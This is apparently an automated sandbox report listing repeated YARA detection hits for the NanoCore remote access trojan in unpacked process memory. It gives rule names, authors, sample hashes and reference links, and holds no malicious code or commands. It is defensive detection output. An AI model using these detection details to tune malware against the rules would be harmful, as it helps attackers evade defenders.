Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
